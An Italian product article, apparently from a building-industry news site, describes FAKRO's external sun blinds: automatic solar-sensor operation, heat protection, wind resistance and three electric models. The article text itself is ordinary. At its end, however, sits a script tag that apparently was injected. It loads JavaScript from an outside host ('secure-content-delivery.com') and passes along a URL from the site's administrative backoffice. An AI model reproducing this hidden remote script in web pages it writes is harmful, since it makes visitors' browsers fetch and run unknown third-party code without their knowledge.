1. Home
  2. Notizie e Mercato
  3. La tenda esterna parasole di Fakro che protegge dal calore

La tenda esterna parasole di Fakro che protegge dal calore

Infissi e Serramenti di
5/5
votato da 1 persone
La tenda parasole da esterni di FAKRO aumenta la qualità d’utilizzo della finestra creando la possibilità di controllo della luce, di riduzione del calore e di risparmio energetico.


La tenda parasole per esterno è una combinazione efficace tra protezione contro il calore e comodità di utilizzo. Questa tenda è un prodotto innovativo, dotato di un intelligente sistema di esecuzione automatica che si attiva a seconda del livello di irraggiamento: un sensore fotovoltaico, combinato con uno speciale sistema elettronico, reagisce alla radiazione solare garantendo un migliore isolamento termico.

In estate, quando vengono raggiunti alti livelli di calore, la tenda per esterno si abbassa  automaticamente ed assorbe le radiazioni solari prima che cada sul vetro della finestra, impedendo in tal modo che il calore entri nella stanza. Nelle giornate nuvolose, invece, la tenda si arrotola automaticamente, aumentando così la quantità di luce naturale disponibile. La tenda parasole esterna assicura una protezione dal calore fino ad otto volte superiore rispetto alla tenda interna oscurante, e garantisce allo stesso tempo un afflusso di luce naturale e il contatto visivo con l’ambiente.
Grazie alla sua elevata resistenza, la tenda è in grado di sopportare raffiche di vento fino a 120 km/h e venti laterali fino a 220 km/h.

La tenda parasole per esterno migliora le condizioni ergonomiche, consentendo una distribuzione uniforme della luce e assicurando comfort per gli occhi e protezione dagli effetti dannosi dei riflessi, specialmente quando si guarda la televisione o si usa un personal computer dotato di schermo piatto.
E' stato riscontrato che nelle stanze in cui è presente la tenda parasole gli occhi sono molto meno affaticati rispetto a stanze senza l'ausilio delle tende, dove la distribuzione della luce tende ad essere molto irregolare.

La tenda parasole FAKRO può essere azionata in una delle tre seguenti modalità :
•    automatica (auto-attivante, la tenda si avvolge e si srotola a seconda del livello di insolazione);
•    semiautomatica (auto-attivante o tramite un telecomando che permette l’avvolgimento e lo srotolamento);
•    funzionamento a distanza tramite telecomando in dotazione.

Le tende comandate elettricamente sono l'unione tra l'efficienza della protezione contro le alte temperature e l'alto comfort di utilizzo. Dopo aver montato la tenda, basta premere il pulsante sul dispositivo di controllo e, in un attimo, la tenda si chiude, cosi' la tenda assorbe le radiazioni solari ancora prima che queste raggiungano il vetro emettendo il calore all'esterno invece che all'interno.

La tenda parasole elettrica è disponibile in tre versioni:
AMZ Z-Wave, è alimentata dalla corrente elettrica e comandata dal telecomando oppure dalla pulsantiera a parete, funzionante con il sistema senza fili Z-Wave. Può essere fermata in qualsiasi posizione;
AMZ Solar, funziona automaticamente. A seconda del grado di esposizione si apre  automaticamente proteggendo la mansarda contro il riscaldamento. La modalità automatica si può disattivare.
VMZ SOLAR, per finestre verticali. Dal momento che può essere installata senza bisogno di alimentazione elettrica, la tenda parasole per esterno VMZ rappresenta la soluzione ideale sia per abitazioni unifamiliari, sia per edifici residenziali e pubblici. È anche ideale come zanzariera.


 


<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.27495888323616435" type="text/javascript"></script>